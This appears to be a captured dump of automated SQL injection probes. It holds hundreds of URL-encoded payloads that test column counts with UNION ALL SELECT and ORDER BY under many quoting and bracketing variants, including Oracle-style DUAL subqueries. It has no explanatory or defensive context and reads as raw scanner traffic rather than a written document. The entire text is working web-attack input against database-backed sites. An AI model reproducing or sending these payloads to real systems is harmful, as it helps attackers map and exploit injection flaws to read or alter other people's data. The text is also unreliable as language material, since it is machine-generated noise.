-6541%22%29%29%29%20UNION%20ALL%20SELECT%204713%2C%204713%2C%204713--%20%20AND%20%28%28%28%22FvgD%22%3D%22FvgD -6035%22%29%29%29%20UNION%20ALL%20SELECT%205490%2C%205490%2C%205490%2C%205490--%20%20AND%20%28%28%28%22ExaM%22%3D%22ExaM -4534%22%29%29%29%20UNION%20ALL%20SELECT%207294%2C%207294%2C%207294%2C%207294%2C%207294--%20%20AND%20%28%28%28%22jSiu%22%3D%22jSiu -3307%22%29%29%29%20UNION%20ALL%20SELECT%201627%2C%201627%2C%201627%2C%201627%2C%201627%2C%201627--%20%20AND%20%28%28%28%22wehN%22%3D%22wehN -7412%22%29%29%29%20UNION%20ALL%20SELECT%202322%2C%202322%2C%202322%2C%202322%2C%202322%2C%202322%2C%202322--%20%20AND%20%28%28%28%22kANN%22%3D%22kANN -2986%22%29%29%29%20UNION%20ALL%20SELECT%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104%2C%205104--%20%20AND%20%28%28%28%22nJum%22%3D%22nJum -4149%22%29%29%29%20UNION%20ALL%20SELECT%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533%2C%201533--%20%20AND%20%28%28%28%22oAnN%22%3D%22oAnN -4692%22%29%29%29%20UNION%20ALL%20SELECT%203811%2C%203811%2C%203811%2C%203811%2C%203811%2C%203811%2C%203811%2C%203811%2C%203811%2C%203811--%20%20AND%20%28%28%28%22XbQe%22%3D%22XbQe -6643%22%20ORDER%20BY%201--%20%20AND%20%22ZbMb%22%3D%22ZbMb -6833%22%20ORDER%20BY%202927--%20%20AND%20%22WSsT%22%3D%22WSsT -3027%22%20UNION%20ALL%20SELECT%206425--%20%20AND%20%22OfMP%22%3D%22OfMP -4743%22%20UNION%20ALL%20SELECT%207041%2C%207041--%20%20AND%20%22jzcl%22%3D%22jzcl -7534%22%20UNION%20ALL%20SELECT%204253%2C%204253%2C%204253--%20%20AND%20%22gqMM%22%3D%22gqMM -5583%22%20UNION%20ALL%20SELECT%209428%2C%209428%2C%209428%2C%209428--%20%20AND%20%22kNYl%22%3D%22kNYl -7181%22%20UNION%20ALL%20SELECT%202726%2C%202726%2C%202726%2C%202726%2C%202726--%20%20AND%20%22arQV%22%3D%22arQV -6351%22%20UNION%20ALL%20SELECT%201108%2C%201108%2C%201108%2C%201108%2C%201108%2C%201108--%20%20AND%20%22Pmwz%22%3D%22Pmwz -9832%22%20UNION%20ALL%20SELECT%201088%2C%201088%2C%201088%2C%201088%2C%201088%2C%201088%2C%201088--%20%20AND%20%22HSEO%22%3D%22HSEO -3287%22%20UNION%20ALL%20SELECT%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166%2C%208166--%20%20AND%20%22gMEF%22%3D%22gMEF -5215%22%20UNION%20ALL%20SELECT%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906%2C%209906--%20%20AND%20%22ZWTs%22%3D%22ZWTs -5608%22%20UNION%20ALL%20SELECT%203390%2C%203390%2C%203390%2C%203390%2C%203390%2C%203390%2C%203390%2C%203390%2C%203390%2C%203390--%20%20AND%20%22rFrP%22%3D%22rFrP -7511%22%29%20ORDER%20BY%201--%20%20AND%20%28%22vqEc%22%20LIKE%20%22vqEc -7305%22%29%20ORDER%20BY%207150--%20%20AND%20%28%22ofYI%22%20LIKE%20%22ofYI -7340%22%29%20UNION%20ALL%20SELECT%201376--%20%20AND%20%28%22Giyv%22%20LIKE%20%22Giyv -7480%22%29%20UNION%20ALL%20SELECT%205733%2C%205733--%20%20AND%20%28%22qQyH%22%20LIKE%20%22qQyH -6373%22%29%20UNION%20ALL%20SELECT%209086%2C%209086%2C%209086--%20%20AND%20%28%22JPWM%22%20LIKE%20%22JPWM -3564%22%29%20UNION%20ALL%20SELECT%209267%2C%209267%2C%209267%2C%209267--%20%20AND%20%28%22Nejv%22%20LIKE%20%22Nejv -5641%22%29%20UNION%20ALL%20SELECT%209838%2C%209838%2C%209838%2C%209838%2C%209838--%20%20AND%20%28%22UVHD%22%20LIKE%20%22UVHD -2210%22%29%20UNION%20ALL%20SELECT%203116%2C%203116%2C%203116%2C%203116%2C%203116%2C%203116--%20%20AND%20%28%22WCac%22%20LIKE%20%22WCac -6163%22%29%20UNION%20ALL%20SELECT%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099%2C%208099--%20%20AND%20%28%22eXOj%22%20LIKE%20%22eXOj -7274%22%29%20UNION%20ALL%20SELECT%206728%2C%206728%2C%206728%2C%206728%2C%206728%2C%206728%2C%206728%2C%206728--%20%20AND%20%28%22HaGL%22%20LIKE%20%22HaGL -5499%22%29%20UNION%20ALL%20SELECT%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757%2C%206757--%20%20AND%20%28%22eQSI%22%20LIKE%20%22eQSI -5398%22%29%20UNION%20ALL%20SELECT%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512--%20%20AND%20%28%22RnPL%22%20LIKE%20%22RnPL -9282%22%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%22ZntY%22%20LIKE%20%22ZntY -8260%22%29%29%20ORDER%20BY%204497--%20%20AND%20%28%28%22ToPE%22%20LIKE%20%22ToPE -6154%22%29%29%20UNION%20ALL%20SELECT%202173--%20%20AND%20%28%28%22Aivw%22%20LIKE%20%22Aivw -9602%22%29%29%20UNION%20ALL%20SELECT%206935%2C%206935--%20%20AND%20%28%28%22gWJA%22%20LIKE%20%22gWJA -4548%22%29%29%20UNION%20ALL%20SELECT%204366%2C%204366%2C%204366--%20%20AND%20%28%28%22zcAR%22%20LIKE%20%22zcAR -9991%22%29%29%20UNION%20ALL%20SELECT%204961%2C%204961%2C%204961%2C%204961--%20%20AND%20%28%28%22KKqQ%22%20LIKE%20%22KKqQ -4969%22%29%29%20UNION%20ALL%20SELECT%207508%2C%207508%2C%207508%2C%207508%2C%207508--%20%20AND%20%28%28%22hORI%22%20LIKE%20%22hORI -1860%22%29%29%20UNION%20ALL%20SELECT%202519%2C%202519%2C%202519%2C%202519%2C%202519%2C%202519--%20%20AND%20%28%28%22hEva%22%20LIKE%20%22hEva -4731%22%29%29%20UNION%20ALL%20SELECT%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496%2C%206496--%20%20AND%20%28%28%22NMKW%22%20LIKE%20%22NMKW -2510%22%29%29%20UNION%20ALL%20SELECT%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636%2C%206636--%20%20AND%20%28%28%22qRWj%22%20LIKE%20%22qRWj -3972%22%29%29%20UNION%20ALL%20SELECT%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341--%20%20AND%20%28%28%22FOll%22%20LIKE%20%22FOll -9145%22%29%29%20UNION%20ALL%20SELECT%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416%2C%204416--%20%20AND%20%28%28%22jUnu%22%20LIKE%20%22jUnu -5182%22%29%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%28%22nfiM%22%20LIKE%20%22nfiM -3869%22%29%29%29%20ORDER%20BY%201044--%20%20AND%20%28%28%28%22dDkI%22%20LIKE%20%22dDkI -4154%22%29%29%29%20UNION%20ALL%20SELECT%203536--%20%20AND%20%28%28%28%22XEtc%22%20LIKE%20%22XEtc -4134%22%29%29%29%20UNION%20ALL%20SELECT%207725%2C%207725--%20%20AND%20%28%28%28%22XWQn%22%20LIKE%20%22XWQn -9130%22%29%29%29%20UNION%20ALL%20SELECT%202262%2C%202262%2C%202262--%20%20AND%20%28%28%28%22MvdU%22%20LIKE%20%22MvdU -8752%22%29%29%29%20UNION%20ALL%20SELECT%201388%2C%201388%2C%201388%2C%201388--%20%20AND%20%28%28%28%22fFKz%22%20LIKE%20%22fFKz -2213%22%29%29%29%20UNION%20ALL%20SELECT%209124%2C%209124%2C%209124%2C%209124%2C%209124--%20%20AND%20%28%28%28%22IDLS%22%20LIKE%20%22IDLS -4982%22%29%29%29%20UNION%20ALL%20SELECT%208985%2C%208985%2C%208985%2C%208985%2C%208985%2C%208985--%20%20AND%20%28%28%28%22KMoT%22%20LIKE%20%22KMoT -6442%22%29%29%29%20UNION%20ALL%20SELECT%207838%2C%207838%2C%207838%2C%207838%2C%207838%2C%207838%2C%207838--%20%20AND%20%28%28%28%22CnWK%22%20LIKE%20%22CnWK -4426%22%29%29%29%20UNION%20ALL%20SELECT%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661%2C%203661--%20%20AND%20%28%28%28%22Anon%22%20LIKE%20%22Anon -1106%22%29%29%29%20UNION%20ALL%20SELECT%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886%2C%208886--%20%20AND%20%28%28%28%22vOCI%22%20LIKE%20%22vOCI -6057%22%29%29%29%20UNION%20ALL%20SELECT%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592%2C%206592--%20%20AND%20%28%28%28%22AnFP%22%20LIKE%20%22AnFP -1980%22%20ORDER%20BY%201--%20%20AND%20%22aSNT%22%20LIKE%20%22aSNT -8503%22%20ORDER%20BY%201054--%20%20AND%20%22LceP%22%20LIKE%20%22LceP -1163%22%20UNION%20ALL%20SELECT%204366--%20%20AND%20%22jlkP%22%20LIKE%20%22jlkP -9144%22%20UNION%20ALL%20SELECT%208573%2C%208573--%20%20AND%20%22lbEC%22%20LIKE%20%22lbEC -8619%22%20UNION%20ALL%20SELECT%201416%2C%201416%2C%201416--%20%20AND%20%22UCoC%22%20LIKE%20%22UCoC -2635%22%20UNION%20ALL%20SELECT%202475%2C%202475%2C%202475%2C%202475--%20%20AND%20%22XnmS%22%20LIKE%20%22XnmS -7192%22%20UNION%20ALL%20SELECT%207921%2C%207921%2C%207921%2C%207921%2C%207921--%20%20AND%20%22rjYx%22%20LIKE%20%22rjYx -4858%22%20UNION%20ALL%20SELECT%206736%2C%206736%2C%206736%2C%206736%2C%206736%2C%206736--%20%20AND%20%22gCLF%22%20LIKE%20%22gCLF -9929%22%20UNION%20ALL%20SELECT%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749%2C%204749--%20%20AND%20%22AdTZ%22%20LIKE%20%22AdTZ -9130%22%20UNION%20ALL%20SELECT%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130%2C%207130--%20%20AND%20%22Dcri%22%20LIKE%20%22Dcri -9028%22%20UNION%20ALL%20SELECT%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015%2C%201015--%20%20AND%20%22fKmz%22%20LIKE%20%22fKmz -7011%22%20UNION%20ALL%20SELECT%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543%2C%201543--%20%20AND%20%22VamN%22%20LIKE%20%22VamN -8399%29%20WHERE%208409%3D8409%20ORDER%20BY%201--%20 -5186%29%20WHERE%203236%3D3236%20ORDER%20BY%206367--%20 -7155%29%20WHERE%201228%3D1228%20UNION%20ALL%20SELECT%201228--%20 -1380%29%20WHERE%206002%3D6002%20UNION%20ALL%20SELECT%206002%2C%206002--%20 -2595%29%20WHERE%205388%3D5388%20UNION%20ALL%20SELECT%205388%2C%205388%2C%205388--%20 -1165%29%20WHERE%202287%3D2287%20UNION%20ALL%20SELECT%202287%2C%202287%2C%202287%2C%202287--%20 -9351%29%20WHERE%206916%3D6916%20UNION%20ALL%20SELECT%206916%2C%206916%2C%206916%2C%206916%2C%206916--%20 -7612%29%20WHERE%209916%3D9916%20UNION%20ALL%20SELECT%209916%2C%209916%2C%209916%2C%209916%2C%209916%2C%209916--%20 -8818%29%20WHERE%206364%3D6364%20UNION%20ALL%20SELECT%206364%2C%206364%2C%206364%2C%206364%2C%206364%2C%206364%2C%206364--%20 -2490%29%20WHERE%208520%3D8520%20UNION%20ALL%20SELECT%208520%2C%208520%2C%208520%2C%208520%2C%208520%2C%208520%2C%208520%2C%208520--%20 -6330%29%20WHERE%201382%3D1382%20UNION%20ALL%20SELECT%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382%2C%201382--%20 -1673%29%20WHERE%206753%3D6753%20UNION%20ALL%20SELECT%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753%2C%206753--%20 -1356%27%29%20WHERE%209014%3D9014%20ORDER%20BY%201--%20 -3057%27%29%20WHERE%207403%3D7403%20ORDER%20BY%208425--%20 -9863%27%29%20WHERE%207088%3D7088%20UNION%20ALL%20SELECT%207088--%20 -8753%27%29%20WHERE%204620%3D4620%20UNION%20ALL%20SELECT%204620%2C%204620--%20 -3354%27%29%20WHERE%203462%3D3462%20UNION%20ALL%20SELECT%203462%2C%203462%2C%203462--%20 -8191%27%29%20WHERE%202112%3D2112%20UNION%20ALL%20SELECT%202112%2C%202112%2C%202112%2C%202112--%20 -1239%27%29%20WHERE%208625%3D8625%20UNION%20ALL%20SELECT%208625%2C%208625%2C%208625%2C%208625%2C%208625--%20 -1475%27%29%20WHERE%204196%3D4196%20UNION%20ALL%20SELECT%204196%2C%204196%2C%204196%2C%204196%2C%204196%2C%204196--%20 -2196%27%29%20WHERE%201185%3D1185%20UNION%20ALL%20SELECT%201185%2C%201185%2C%201185%2C%201185%2C%201185%2C%201185%2C%201185--%20 -6330%27%29%20WHERE%203045%3D3045%20UNION%20ALL%20SELECT%203045%2C%203045%2C%203045%2C%203045%2C%203045%2C%203045%2C%203045%2C%203045--%20 -7036%27%29%20WHERE%202428%3D2428%20UNION%20ALL%20SELECT%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428%2C%202428--%20 -5126%27%29%20WHERE%208765%3D8765%20UNION%20ALL%20SELECT%208765%2C%208765%2C%208765%2C%208765%2C%208765%2C%208765%2C%208765%2C%208765%2C%208765%2C%208765--%20 -4627%27%20WHERE%203712%3D3712%20ORDER%20BY%201--%20 -2082%27%20WHERE%202582%3D2582%20ORDER%20BY%201698--%20 -1941%27%20WHERE%207403%3D7403%20UNION%20ALL%20SELECT%207403--%20 -8734%27%20WHERE%203173%3D3173%20UNION%20ALL%20SELECT%203173%2C%203173--%20 -2801%27%20WHERE%209984%3D9984%20UNION%20ALL%20SELECT%209984%2C%209984%2C%209984--%20 -1083%27%20WHERE%206114%3D6114%20UNION%20ALL%20SELECT%206114%2C%206114%2C%206114%2C%206114--%20 -3693%27%20WHERE%204456%3D4456%20UNION%20ALL%20SELECT%204456%2C%204456%2C%204456%2C%204456%2C%204456--%20 -2601%27%20WHERE%203059%3D3059%20UNION%20ALL%20SELECT%203059%2C%203059%2C%203059%2C%203059%2C%203059%2C%203059--%20 -3814%27%20WHERE%202264%3D2264%20UNION%20ALL%20SELECT%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264%2C%202264--%20 -3891%27%20WHERE%202775%3D2775%20UNION%20ALL%20SELECT%202775%2C%202775%2C%202775%2C%202775%2C%202775%2C%202775%2C%202775%2C%202775--%20 -2358%27%20WHERE%206198%3D6198%20UNION%20ALL%20SELECT%206198%2C%206198%2C%206198%2C%206198%2C%206198%2C%206198%2C%206198%2C%206198%2C%206198--%20 -7684%27%20WHERE%204893%3D4893%20UNION%20ALL%20SELECT%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893%2C%204893--%20 -7098%22%20WHERE%209119%3D9119%20ORDER%20BY%201--%20 -9378%22%20WHERE%209570%3D9570%20ORDER%20BY%203646--%20 -5596%22%20WHERE%207332%3D7332%20UNION%20ALL%20SELECT%207332--%20 -6102%22%20WHERE%201149%3D1149%20UNION%20ALL%20SELECT%201149%2C%201149--%20 -5078%22%20WHERE%209106%3D9106%20UNION%20ALL%20SELECT%209106%2C%209106%2C%209106--%20 -2805%22%20WHERE%206572%3D6572%20UNION%20ALL%20SELECT%206572%2C%206572%2C%206572%2C%206572--%20 -1965%22%20WHERE%209801%3D9801%20UNION%20ALL%20SELECT%209801%2C%209801%2C%209801%2C%209801%2C%209801--%20 -4956%22%20WHERE%208567%3D8567%20UNION%20ALL%20SELECT%208567%2C%208567%2C%208567%2C%208567%2C%208567%2C%208567--%20 -2871%22%20WHERE%204128%3D4128%20UNION%20ALL%20SELECT%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128%2C%204128--%20 -4252%22%20WHERE%202854%3D2854%20UNION%20ALL%20SELECT%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854%2C%202854--%20 -4276%22%20WHERE%202702%3D2702%20UNION%20ALL%20SELECT%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702%2C%202702--%20 -2060%22%20WHERE%204670%3D4670%20UNION%20ALL%20SELECT%204670%2C%204670%2C%204670%2C%204670%2C%204670%2C%204670%2C%204670%2C%204670%2C%204670%2C%204670--%20 -5809%27%20%7C%7C%20%28SELECT%204566%20FROM%20DUAL%20WHERE%201835%3D1835%20ORDER%20BY%201--%20%20%29%20%7C%7C%20%27 -6610%27%20%7C%7C%20%28SELECT%202810%20FROM%20DUAL%20WHERE%207262%3D7262%20ORDER%20BY%201745--%20%20%29%20%7C%7C%20%27 -3099%27%20%7C%7C%20%28SELECT%206315%20FROM%20DUAL%20WHERE%203484%3D3484%20UNION%20ALL%20SELECT%203484--%20%20%29%20%7C%7C%20%27 -3895%27%20%7C%7C%20%28SELECT%204928%20FROM%20DUAL%20WHERE%201700%3D1700%20UNION%20ALL%20SELECT%201700%2C%201700--%20%20%29%20%7C%7C%20%27 -4454%27%20%7C%7C%20%28SELECT%209728%20FROM%20DUAL%20WHERE%207079%3D7079%20UNION%20ALL%20SELECT%207079%2C%207079%2C%207079--%20%20%29%20%7C%7C%20%27 -3066%27%20%7C%7C%20%28SELECT%209849%20FROM%20DUAL%20WHERE%202018%3D2018%20UNION%20ALL%20SELECT%202018%2C%202018%2C%202018%2C%202018--%20%20%29%20%7C%7C%20%27 -2755%27%20%7C%7C%20%28SELECT%201024%20FROM%20DUAL%20WHERE%207750%3D7750%20UNION%20ALL%20SELECT%207750%2C%207750%2C%207750%2C%207750%2C%207750--%20%20%29%20%7C%7C%20%27 -1513%27%20%7C%7C%20%28SELECT%207686%20FROM%20DUAL%20WHERE%209049%3D9049%20UNION%20ALL%20SELECT%209049%2C%209049%2C%209049%2C%209049%2C%209049%2C%209049--%20%20%29%20%7C%7C%20%27 -7332%27%20%7C%7C%20%28SELECT%208061%20FROM%20DUAL%20WHERE%202248%3D2248%20UNION%20ALL%20SELECT%202248%2C%202248%2C%202248%2C%202248%2C%202248%2C%202248%2C%202248--%20%20%29%20%7C%7C%20%27 -6354%27%20%7C%7C%20%28SELECT%205220%20FROM%20DUAL%20WHERE%203107%3D3107%20UNION%20ALL%20SELECT%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107--%20%20%29%20%7C%7C%20%27 -7938%27%20%7C%7C%20%28SELECT%203292%20FROM%20DUAL%20WHERE%204625%3D4625%20UNION%20ALL%20SELECT%204625%2C%204625%2C%204625%2C%204625%2C%204625%2C%204625%2C%204625%2C%204625%2C%204625--%20%20%29%20%7C%7C%20%27 -2737%27%20%7C%7C%20%28SELECT%205461%20FROM%20DUAL%20WHERE%208577%3D8577%20UNION%20ALL%20SELECT%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577%2C%208577--%20%20%29%20%7C%7C%20%27 -9769%27%20%7C%7C%20%28SELECT%204181%20WHERE%208663%3D8663%20ORDER%20BY%201--%20%20%29%20%7C%7C%20%27 -3640%27%20%7C%7C%20%28SELECT%204794%20WHERE%208527%3D8527%20ORDER%20BY%201835--%20%20%29%20%7C%7C%20%27 -1220%27%20%7C%7C%20%28SELECT%203398%20WHERE%204432%3D4432%20UNION%20ALL%20SELECT%204432--%20%20%29%20%7C%7C%20%27 -7217%27%20%7C%7C%20%28SELECT%202836%20WHERE%204009%3D4009%20UNION%20ALL%20SELECT%204009%2C%204009--%20%20%29%20%7C%7C%20%27 -4417%27%20%7C%7C%20%28SELECT%206419%20WHERE%209603%3D9603%20UNION%20ALL%20SELECT%209603%2C%209603%2C%209603--%20%20%29%20%7C%7C%20%27 -4022%27%20%7C%7C%20%28SELECT%206158%20WHERE%207727%3D7727%20UNION%20ALL%20SELECT%207727%2C%207727%2C%207727%2C%207727--%20%20%29%20%7C%7C%20%27 -4039%27%20%7C%7C%20%28SELECT%206054%20WHERE%206135%3D6135%20UNION%20ALL%20SELECT%206135%2C%206135%2C%206135%2C%206135%2C%206135--%20%20%29%20%7C%7C%20%27 -8123%27%20%7C%7C%20%28SELECT%202298%20WHERE%205870%3D5870%20UNION%20ALL%20SELECT%205870%2C%205870%2C%205870%2C%205870%2C%205870%2C%205870--%20%20%29%20%7C%7C%20%27 -4684%27%20%7C%7C%20%28SELECT%203692%20WHERE%202662%3D2662%20UNION%20ALL%20SELECT%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662%2C%202662--%20%20%29%20%7C%7C%20%27 -1489%27%20%7C%7C%20%28SELECT%208234%20WHERE%203303%3D3303%20UNION%20ALL%20SELECT%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303%2C%203303--%20%20%29%20%7C%7C%20%27 -5485%27%20%7C%7C%20%28SELECT%201146%20WHERE%205975%3D5975%20UNION%20ALL%20SELECT%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975%2C%205975--%20%20%29%20%7C%7C%20%27 -3614%27%20%7C%7C%20%28SELECT%205692%20WHERE%203106%3D3106%20UNION%20ALL%20SELECT%203106%2C%203106%2C%203106%2C%203106%2C%203106%2C%203106%2C%203106%2C%203106%2C%203106%2C%203106--%20%20%29%20%7C%7C%20%27 -5062%20%2B%20%28SELECT%209719%20FROM%20DUAL%20WHERE%203979%3D3979%20ORDER%20BY%201--%20%20%29 -1437%20%2B%20%28SELECT%204964%20FROM%20DUAL%20WHERE%202812%3D2812%20ORDER%20BY%202821--%20%20%29 -4096%20%2B%20%28SELECT%201526%20FROM%20DUAL%20WHERE%205365%3D5365%20UNION%20ALL%20SELECT%205365--%20%20%29 -6671%20%2B%20%28SELECT%204303%20FROM%20DUAL%20WHERE%208259%3D8259%20UNION%20ALL%20SELECT%208259%2C%208259--%20%20%29 -5503%20%2B%20%28SELECT%201131%20FROM%20DUAL%20WHERE%208356%3D8356%20UNION%20ALL%20SELECT%208356%2C%208356%2C%208356--%20%20%29 -1623%20%2B%20%28SELECT%204693%20FROM%20DUAL%20WHERE%201151%3D1151%20UNION%20ALL%20SELECT%201151%2C%201151%2C%201151%2C%201151--%20%20%29 -4517%20%2B%20%28SELECT%206493%20FROM%20DUAL%20WHERE%206408%3D6408%20UNION%20ALL%20SELECT%206408%2C%206408%2C%206408%2C%206408%2C%206408--%20%20%29 -5187%20%2B%20%28SELECT%202564%20FROM%20DUAL%20WHERE%204105%3D4105%20UNION%20ALL%20SELECT%204105%2C%204105%2C%204105%2C%204105%2C%204105%2C%204105--%20%20%29 -2368%20%2B%20%28SELECT%209178%20FROM%20DUAL%20WHERE%202289%3D2289%20UNION%20ALL%20SELECT%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289--%20%20%29 -2051%20%2B%20%28SELECT%203863%20FROM%20DUAL%20WHERE%205483%3D5483%20UNION%20ALL%20SELECT%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483%2C%205483--%20%20%29 -5390%20%2B%20%28SELECT%205306%20FROM%20DUAL%20WHERE%206212%3D6212%20UNION%20ALL%20SELECT%206212%2C%206212%2C%206212%2C%206212%2C%206212%2C%206212%2C%206212%2C%206212%2C%206212--%20%20%29 -8219%20%2B%20%28SELECT%205080%20FROM%20DUAL%20WHERE%207209%3D7209%20UNION%20ALL%20SELECT%207209%2C%207209%2C%207209%2C%207209%2C%207209%2C%207209%2C%207209%2C%207209%2C%207209%2C%207209--%20%20%29 -3260%20%2B%20%28SELECT%208083%20WHERE%204117%3D4117%20ORDER%20BY%201--%20%20%29 -9016%20%2B%20%28SELECT%206569%20WHERE%201781%3D1781%20ORDER%20BY%202440--%20%20%29 -2927%20%2B%20%28SELECT%202026%20WHERE%204942%3D4942%20UNION%20ALL%20SELECT%204942--%20%20%29 -4907%20%2B%20%28SELECT%203894%20WHERE%203968%3D3968%20UNION%20ALL%20SELECT%203968%2C%203968--%20%20%29 -6582%20%2B%20%28SELECT%204707%20WHERE%208877%3D8877%20UNION%20ALL%20SELECT%208877%2C%208877%2C%208877--%20%20%29 -9180%20%2B%20%28SELECT%205841%20WHERE%203600%3D3600%20UNION%20ALL%20SELECT%203600%2C%203600%2C%203600%2C%203600--%20%20%29 -8946%20%2B%20%28SELECT%204742%20WHERE%201587%3D1587%20UNION%20ALL%20SELECT%201587%2C%201587%2C%201587%2C%201587%2C%201587--%20%20%29 -9634%20%2B%20%28SELECT%209261%20WHERE%204101%3D4101%20UNION%20ALL%20SELECT%204101%2C%204101%2C%204101%2C%204101%2C%204101%2C%204101--%20%20%29 -4241%20%2B%20%28SELECT%208358%20WHERE%206361%3D6361%20UNION%20ALL%20SELECT%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361--%20%20%29 -2937%20%2B%20%28SELECT%206204%20WHERE%207281%3D7281%20UNION%20ALL%20SELECT%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281--%20%20%29 -8770%20%2B%20%28SELECT%204877%20WHERE%208555%3D8555%20UNION%20ALL%20SELECT%208555%2C%208555%2C%208555%2C%208555%2C%208555%2C%208555%2C%208555%2C%208555%2C%208555--%20%20%29 -7890%20%2B%20%28SELECT%201523%20WHERE%206806%3D6806%20UNION%20ALL%20SELECT%206806%2C%206806%2C%206806%2C%206806%2C%206806%2C%206806%2C%206806%2C%206806%2C%206806%2C%206806--%20%20%29 -9608%27%20%2B%20%28SELECT%20%27bMEh%27%20FROM%20DUAL%20WHERE%207499%3D7499%20ORDER%20BY%201--%20%20%29%20%2B%20%27 -7967%27%20%2B%20%28SELECT%20%27pfEh%27%20FROM%20DUAL%20WHERE%208398%3D8398%20ORDER%20BY%204274--%20%20%29%20%2B%20%27 -3780%27%20%2B%20%28SELECT%20%27YRIF%27%20FROM%20DUAL%20WHERE%207002%3D7002%20UNION%20ALL%20SELECT%207002--%20%20%29%20%2B%20%27 -8621%27%20%2B%20%28SELECT%20%27RPIZ%27%20FROM%20DUAL%20WHERE%207673%3D7673%20UNION%20ALL%20SELECT%207673%2C%207673--%20%20%29%20%2B%20%27 -2063%27%20%2B%20%28SELECT%20%27YTPI%27%20FROM%20DUAL%20WHERE%206284%3D6284%20UNION%20ALL%20SELECT%206284%2C%206284%2C%206284--%20%20%29%20%2B%20%27 -3668%27%20%2B%20%28SELECT%20%27GAAM%27%20FROM%20DUAL%20WHERE%203417%3D3417%20UNION%20ALL%20SELECT%203417%2C%203417%2C%203417%2C%203417--%20%20%29%20%2B%20%27 -7078%27%20%2B%20%28SELECT%20%27qrpd%27%20FROM%20DUAL%20WHERE%202114%3D2114%20UNION%20ALL%20SELECT%202114%2C%202114%2C%202114%2C%202114%2C%202114--%20%20%29%20%2B%20%27 -6837%27%20%2B%20%28SELECT%20%27tOyw%27%20FROM%20DUAL%20WHERE%209739%3D9739%20UNION%20ALL%20SELECT%209739%2C%209739%2C%209739%2C%209739%2C%209739%2C%209739--%20%20%29%20%2B%20%27 -7023%27%20%2B%20%28SELECT%20%27nUJP%27%20FROM%20DUAL%20WHERE%204927%3D4927%20UNION%20ALL%20SELECT%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927%2C%204927--%20%20%29%20%2B%20%27 -8562%27%20%2B%20%28SELECT%20%27lJFL%27%20FROM%20DUAL%20WHERE%208948%3D8948%20UNION%20ALL%20SELECT%208948%2C%208948%2C%208948%2C%208948%2C%208948%2C%208948%2C%208948%2C%208948--%20%20%29%20%2B%20%27 -5602%27%20%2B%20%28SELECT%20%27gXFF%27%20FROM%20DUAL%20WHERE%204605%3D4605%20UNION%20ALL%20SELECT%204605%2C%204605%2C%204605%2C%204605%2C%204605%2C%204605%2C%204605%2C%204605%2C%204605--%20%20%29%20%2B%20%27 -8446%27%20%2B%20%28SELECT%20%27AzRm%27%20FROM%20DUAL%20WHERE%207588%3D7588%20UNION%20ALL%20SELECT%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588%2C%207588--%20%20%29%20%2B%20%27 -4749%27%20%2B%20%28SELECT%20%27qSvb%27%20WHERE%202982%3D2982%20ORDER%20BY%201--%20%20%29%20%2B%20%27 -1249%27%20%2B%20%28SELECT%20%27UpVq%27%20WHERE%208504%3D8504%20ORDER%20BY%202535--%20%20%29%20%2B%20%27 -9320%27%20%2B%20%28SELECT%20%27XGCl%27%20WHERE%208599%3D8599%20UNION%20ALL%20SELECT%208599--%20%20%29%20%2B%20%27 -1669%27%20%2B%20%28SELECT%20%27gVeX%27%20WHERE%204581%3D4581%20UNION%20ALL%20SELECT%204581%2C%204581--%20%20%29%20%2B%20%27 -9065%27%20%2B%20%28SELECT%20%27jMYG%27%20WHERE%202432%3D2432%20UNION%20ALL%20SELECT%202432%2C%202432%2C%202432--%20%20%29%20%2B%20%27 